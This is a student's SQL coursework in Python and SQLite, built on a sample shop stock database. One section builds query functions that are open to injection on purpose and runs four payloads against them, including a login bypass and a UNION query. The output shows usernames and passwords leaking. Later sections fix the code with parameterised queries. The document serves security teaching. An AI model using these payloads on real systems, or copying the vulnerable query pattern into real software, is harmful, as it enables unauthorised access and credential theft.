Mary Magdalene Achero
22-April-2026

Task 1
1. import sqlite3
conn = sqlite3.connect('nyondo_stock.db')
conn.execute('''
CREATE TABLE IF NOT EXISTS products (
id INTEGER PRIMARY KEY AUTOINCREMENT,
name TEXT NOT NULL,
description TEXT,
price REAL NOT NULL
)
''')
conn.executemany(
'INSERT INTO products (name, description, price) VALUES (?, ?, ?)',
[
('Cement (bag)', 'Portland cement 50kg bag', 35000),
('Iron Sheet 3m','Gauge 30 roofing sheet 3m long', 110000),
('Paint 5L', 'Exterior wall paint white 5L', 60000),
('Nails 1kg', 'Common wire nails 1kg pack', 12000),
('Timber 2x4', 'Pine timber plank 2x4 per metre', 25000),
]
)
conn.commit()
rows = conn.execute('SELECT * FROM products').fetchall()
for r in rows: print(r)
2. CREATE TABLE statement
CREATE TABLE IF NOT EXISTS products (
    id INTEGER PRIMARY KEY AUTOINCREMENT,
    name TEXT NOT NULL,
    description TEXT,
    price REAL NOT NULL
);

3. INSERT statement 

INSERT INTO products (name, description, price) VALUES
('Cement (bag)', 'Portland cement 50kg bag', 35000),
('Iron Sheet 3m', 'Gauge 30 roofing sheet 3m', 110000),
('Paint 5L', 'Exterior wall paint white 5L', 60000),
('Nails 1kg', 'Common wire nails 1kg pack', 12000),
('Timber 2x4', 'Pine timber plank 2x4 per metre', 25000);

4. Output
(1, 'Cement (bag)', 'Portland cement 50kg bag', 35000.0)
(2, 'Iron Sheet 3m', 'Gauge 30 roofing sheet 3m long', 110000.0)
(3, 'Paint 5L', 'Exterior wall paint white 5L', 60000.0)
(4, 'Nails 1kg', 'Common wire nails 1kg pack', 12000.0)
(5, 'Timber 2x4', 'Pine timber plank 2x4 per metre', 25000.0)

5. screenshots/answers.txt

Task 2
// General database connection
conn = sqlite3.connect('nyondo_stock.db')
A 

rows = conn.execute('SELECT * FROM products').fetchall()
for r in rows: print(r)

Output
(1, 'Cement (bag)', 'Portland cement 50kg bag', 35000.0)
(2, 'Iron Sheet 3m', 'Gauge 30 roofing sheet 3m long', 110000.0)
(3, 'Paint 5L', 'Exterior wall paint white 5L', 60000.0)
(4, 'Nails 1kg', 'Common wire nails 1kg pack', 12000.0)
(5, 'Timber 2x4', 'Pine timber plank 2x4 per metre', 25000.0)

B
rows = conn.execute('SELECT name, price FROM products').fetchall()
for r in rows: print(r)

Output
('Cement (bag)', 35000.0)
('Iron Sheet 3m', 110000.0)
('Paint 5L', 60000.0)
('Nails 1kg', 12000.0)
('Timber 2x4', 25000.0)

C
rows = conn.execute('SELECT * FROM products WHERE id = 3').fetchall()
for r in rows: print(r)

Output
(3, 'Paint 5L', 'Exterior wall paint white 5L', 60000.0)

D
rows = conn.execute("SELECT * FROM products WHERE name LIKE '%sheet%'").fetchall()
for r in rows: print(r)

Output
(2, 'Iron Sheet 3m', 'Gauge 30 roofing sheet 3m long', 110000.0)

E
rows = conn.execute('SELECT * FROM products ORDER BY price DESC').fetchall()
for r in rows: print(r)

Output
(2, 'Iron Sheet 3m', 'Gauge 30 roofing sheet 3m long', 110000.0)
(3, 'Paint 5L', 'Exterior wall paint white 5L', 60000.0)
(1, 'Cement (bag)', 'Portland cement 50kg bag', 35000.0)
(5, 'Timber 2x4', 'Pine timber plank 2x4 per metre', 25000.0)
(4, 'Nails 1kg', 'Common wire nails 1kg pack', 12000.0)

F
rows = conn.execute('SELECT * FROM products ORDER BY price DESC LIMIT 2').fetchall()
for r in rows: print(r)

Output
(2, 'Iron Sheet 3m', 'Gauge 30 roofing sheet 3m long', 110000.0)
(3, 'Paint 5L', 'Exterior wall paint white 5L', 60000.0)

G
conn.execute('UPDATE products SET price = 38000 WHERE id = 1')
rows = conn.execute('SELECT * FROM products').fetchall()
for r in rows: print(r)

Output
(1, 'Cement (bag)', 'Portland cement 50kg bag', 38000.0)
(2, 'Iron Sheet 3m', 'Gauge 30 roofing sheet 3m long', 110000.0)
(3, 'Paint 5L', 'Exterior wall paint white 5L', 60000.0)
(4, 'Nails 1kg', 'Common wire nails 1kg pack', 12000.0)
(5, 'Timber 2x4', 'Pine timber plank 2x4 per metre', 25000.0)

screenshots/task2.png

Task 3
import sqlite3
conn = sqlite3.connect('nyondo_stock.db')

def search_product(name):
    query = f"SELECT * FROM products WHERE name LIKE '%{name}%'"
    print(f'Query: {query}')
    rows = conn.execute(query).fetchall()
    print(f'Result: {rows}\n')
    return rows

def login(username, password):
    query = f"SELECT * FROM users WHERE username='{username}' AND password='{password}'"
    print(f'Query: {query}')
    row = conn.execute(query).fetchone()
    print(f'Result: {row}\n')
    return row


search_product("' OR 1=1--")
login("admin'--", "anything")
login("' OR '1'='1", "' OR '1'='1")
search_product("' UNION SELECT id, username, password, role FROM users--")

Queries printed
Attack 1 - Dump all products
SELECT * FROM products WHERE name LIKE '%' OR 1=1--%'

Attack 2 - Login bypass with no password
 SELECT * FROM users WHERE username='admin'--' AND password='anything'

Attack 3 - Always true login
SELECT * FROM users WHERE username='' OR '1'='1' AND password='' OR '1'='1'

Attack 4 - UNION attack (steal user data from the product search)
SELECT * FROM products WHERE name LIKE '%' UNION SELECT id, username, password, role FROM users--%'

Results
Attack 1 - Dump all products
Result: [(1, 'Cement (bag)', 'Portland cement 50kg bag', 35000.0), (2, 'Iron Sheet 3m', 'Gauge 30 roofing sheet 3m long', 110000.0), (3, 'Paint 5L', 'Exterior wall paint white 5L', 60000.0), (4, 'Nails 1kg', 'Common wire nails 1kg pack', 12000.0), (5, 'Timber 2x4', 'Pine timber plank 2x4 per metre', 25000.0)]

Attack 2 - Login bypass with no password
Result: (1, 'admin', 'admin123', 'admin')

Attack 3 - Always true login
Result: (1, 'admin', 'admin123', 'admin')

Attack 4 - UNION attack (steal user data from the product search)
Result: [(1, 'Cement (bag)', 'Portland cement 50kg bag', 35000.0), (1, 'admin', 'admin123', 'admin'), (2, 'Iron Sheet 3m', 'Gauge 30 roofing sheet 3m long', 110000.0), (2, 'fatuma', 'pass456', 'attendant'), (3, 'Paint 5L', 'Exterior wall paint white 5L', 60000.0), (3, 'wasswa', 'pass789', 'manager'), (4, 'Nails 1kg', 'Common wire nails 1kg pack', 12000.0), (5, 'Timber 2x4', 'Pine timber plank 2x4 per metre', 25000.0)]

Why it worked
Attack 1: search_product("' OR 1=1--")
It worked because the input is inserted directly into the SQL string using f-string, and 1=1 makes the WHERE condition always true and -- comments out the rest, causing the query to return all products.

Attack 2: login("admin'--", "anything")
It worked because admin'-- closes the username string and comments out everything after it including AND password='anything', so the query effectively becomes “find users where username = 'admin'” and logs you in without knowing the password.

Attack 3: login("' OR '1'='1", "' OR '1'='1")
It worked because both fields inject an always-true condition ('1'='1'), making the WHERE clause true for every user in the database.fetchone() returns the first user — typically the admin who is able to login with zero credentials.

Attack 4: search_product("' UNION SELECT id, username, password, role FROM users--")
It worked because UNION SELECT lets an attacker combine results from a second query, and since the products table has 4 columns (id, name, description, price) and the users table also has 4 columns (id, username, password, role) — the column counts match, so UNION works.
The attacker's second query pulls username and password from the users table so the database returns user credentials mixed into the product search results.

screenshots/task3_attack1.png
screenshots/task3_attack2.png
screenshots/task3_attack3.png
screenshots/task3_attack4.png

Task 4
import sqlite3
conn = sqlite3.connect('nyondo_stock.db')

# TODO: rewrite using ? placeholder - never use f-strings in SQL
def search_product_safe(name):
# your code here
    query = 'SELECT * FROM products WHERE name LIKE ?'
    rows = conn.execute(query,(f'%{name}%',)).fetchall()
    return rows

def login_safe(username, password):
# your code here
    query = 'SELECT * FROM users WHERE username = ? AND password= ?'
    row = conn.execute(query,(username, password)).fetchone()
    return row

# These must ALL return [] or None when you run them
print('Test 1:', search_product_safe("' OR 1=1--"))
print('Test 2:', search_product_safe("' UNION SELECT id,username,password,role FROM users--"))
print('Test 3:', login_safe("admin'--", 'anything'))
print('Test 4:', login_safe("' OR '1'='1", "' OR '1'='1"))

2.
Test 1: [] -injection payload treated as literal text, no product named "' OR 1=1--"
Test 2: [] -UNION attack treated as literal text
Test 3: None -comment attack treated as literal text
Test 4: None -always-true attack treated as literal

3.WHY does using ?
prevent injection? What is the difference between an f-string and a parameterised query at the database
level?
The core principle is that with parameterised queries, the SQL structure and the data travel to the database engine separately. The database compiles the SQL first (deciding what it will do), then plugs in the data values. The data can never change the structure of the query.

With f-string, user input is part of the SQL whereas for parameterised query, user input is separate data
Database sees one mixed string in f-string while	Database sees SQL structure and data separately in parameterised query.

f-string = handing someone a blank piece of paper and saying "write whatever you want" — they could write anything, including new instructions.
Parameterised query = handing someone a pre-printed form with fixed boxes — they can only fill in the boxes, not change the form itself.

screenshots/task4

Task 5
1.
import sqlite3
conn = sqlite3.connect('nyondo_stock.db')

# TODO: rewrite using ? placeholder - never use f-strings in SQL
def search_product_safe(name):
# your code here
    # Input Validation
    if not isinstance(name, str) or len(name) < 2:
        print("Validation error: Name must be a string with at least 2 characters")
        return None
    for ch in ['<', '>', ';']:
        if ch in name:
            print(f"Validation error: Invalid character {ch} in name")
            return None

    query = 'SELECT * FROM products WHERE name LIKE ?'
    rows = conn.execute(query,(f'%{name}%',)).fetchall()
    return rows

def login_safe(username, password):
# your code here
    # Input Validation
    if not isinstance(username, str) or len(username) < 2:
        print("Validation error: Username must be a string with at least 2 characters")
        return None
    if ' ' in username:
        print("Validation error: username must not contain spaces.")
        return None
    if not isinstance(password, str) or len(password) < 6:
        print("Validation error: password must be a string with at least 6 characters.")
        return None
    
    query = 'SELECT * FROM users WHERE username = ? AND password= ?'
    row = conn.execute(query,(username, password)).fetchone()
    return row

# These must ALL return [] or None when you run them
# print('Test 1:', search_product_safe("' OR 1=1--"))
# print('Test 2:', search_product_safe("' UNION SELECT id,username,password,role FROM users--"))
# print('Test 3:', login_safe("admin'--", 'anything'))
# print('Test 4:', login_safe("' OR '1'='1", "' OR '1'='1"))

print('Test 1:', search_product_safe('cement'))
print('Test 2:', search_product_safe(''))
print('Test 3:', search_product_safe('<script>'))
print('Test 4:', login_safe('admin', 'admin123'))
print('Test 5:', login_safe('admin','ab'))
print('Test 6:',login_safe('ad min', 'pass123'))

2. 
Test 1: [(1, 'Cement (bag)', 'Portland cement 50kg bag', 35000.0)]
Validation error: Name must be a string with at least 2 characters
Test 2: None
Validation error: Invalid character < in name
Test 3: None
Test 4: (1, 'admin', 'admin123', 'admin')
Validation error: password must be a string with at least 6 characters.
Test 5: None
Validation error: username must not contain spaces.
Test 6: None

3. screenshots/task5.png